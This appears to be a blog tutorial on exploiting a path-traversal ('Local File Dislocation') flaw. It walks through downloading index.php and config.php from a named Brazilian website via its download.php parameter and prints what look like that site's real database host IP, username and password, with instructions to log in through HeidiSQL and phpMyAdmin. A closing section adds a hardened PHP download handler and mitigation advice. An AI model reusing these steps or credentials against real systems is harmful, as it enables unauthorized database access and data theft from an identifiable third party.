LFD (Local File Dislocation)

What Is LFD:-

In Local File Dislocation, the attacker is able to download the config.php (database) file, steal the DB password, user name, database name and host name, connect to the database using some software (HeidiSQL), and then log in to phpMyAdmin.



In Local File Dislocation, the URL shows the web server directory (that is the vulnerable section).
Ex:-


www.site.com/download.php?arquivo=/home/mturbina2/public_html/sistema/apresentacao.pdf



OK, let's start. I have a website; try to download the config file:-



Target:-www.mturbina.com.br/site/download.php?arquivo=/home/mturbina2/public_html/sistema/produtos/kaindl/000000011/pdf/apresentacao.pdf



Step:-1 Copy and paste the target URL into the web browser's URL bar and hit Enter.

Step:-2 When we hit Enter, one file is downloaded. This file is useless; we only need to download index.php and config.php.



Step:-3 Remove everything in the URL after (download.php?arquivo=), or remove the part of the URL after (=/home/mturbina2/public_html/). Follow either condition; I follow the first.

Ex:- (The URL now looks like this) www.mturbina.com.br/site/download.php?arquivo=



Step:-4 Put (../index.php) after ?arquivo=. The (../) is used for directory jumping, that is, going back one directory on the server. Sometimes we use it more than once (../../../../../../../index.php) to reach the correct location.


(But on this site we do not need to jump to another location, so we do not need to put (../).)

Ex:- The URL now looks like this:- http://www.mturbina.com.br/site/download.php?arquivo=index.php

You can see the index.php file start downloading (download it).



Step:-5 Open the downloaded file (index.php) in Notepad.

Using this index.php, we find the location of the config.php (database connection) file.

We successfully find the location of the config file ("../sistema/config.php").



Step:-6 Now download the (../sistema/config.php) file and connect to the database.

Ex:- http://www.mturbina.com.br/site/download.php?arquivo=../sistema/config.php



Step:-7 Open HeidiSQL (download here: http://www.heidisql.com/download.php) and put the database entry in it.

Config entry for HeidiSQL (located in the config file):-

Db_Hostname=179.188.16.14
DbUser=mturbina2
DbPass=turbina72
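
The steps above work because download.php passes the `arquivo` value to the filesystem unchecked, a weakness more commonly called path traversal or arbitrary file download. As an added example (not code from the site or from the original post; the root directory, extension list and function name are assumptions), a download handler that confines the parameter to one directory looks like this:

```php
<?php
// Added example: hardened download handler. DOWNLOAD_ROOT, ALLOWED_EXT and
// resolve_download() are hypothetical names, not taken from the site.
const DOWNLOAD_ROOT = '/var/www/downloads'; // assumed: holds only public documents
const ALLOWED_EXT   = ['pdf'];              // never serve .php or other source files

// Map the user-supplied value to a real file inside $root, or return null.
function resolve_download($requested, string $root = DOWNLOAD_ROOT): ?string
{
    // Arrays (?arquivo[]=x), empty values and NUL bytes are rejected outright.
    if (!is_string($requested) || $requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }
    $rootReal = realpath($root);
    if ($rootReal === false) {
        return null;
    }
    // realpath() resolves "../" and symlinks, and returns false for missing files.
    // Prefixing the root also turns an absolute path such as /home/... into a relative one.
    $real = realpath($rootReal . DIRECTORY_SEPARATOR . $requested);
    if ($real === false || !is_file($real)) {
        return null;
    }
    // Containment check on the resolved path, with a trailing separator so that
    // /var/www/downloads-old does not pass as being inside /var/www/downloads.
    $prefix = $rootReal . DIRECTORY_SEPARATOR;
    if (strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    $ext = strtolower(pathinfo($real, PATHINFO_EXTENSION));
    return in_array($ext, ALLOWED_EXT, true) ? $real : null;
}

if (PHP_SAPI !== 'cli') { // run as a request handler only under a web server
    $path = resolve_download($_GET['arquivo'] ?? null);
    if ($path === null) {
        // Log rejected values: "../" or ".php" in this parameter is worth alerting on.
        error_log('download.php rejected arquivo=' . json_encode($_GET['arquivo'] ?? null));
        http_response_code(404);
        exit;
    }
    header('Content-Type: application/pdf');
    header('Content-Disposition: attachment; filename="' . basename($path) . '"');
    header('Content-Length: ' . filesize($path));
    header('X-Content-Type-Options: nosniff');
    readfile($path);
}
```

Independent of the handler, keeping config.php outside the web root and allowing database connections only from the application host limits what a disclosed file is worth.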


Reviewed by Unknown on 2/21/2016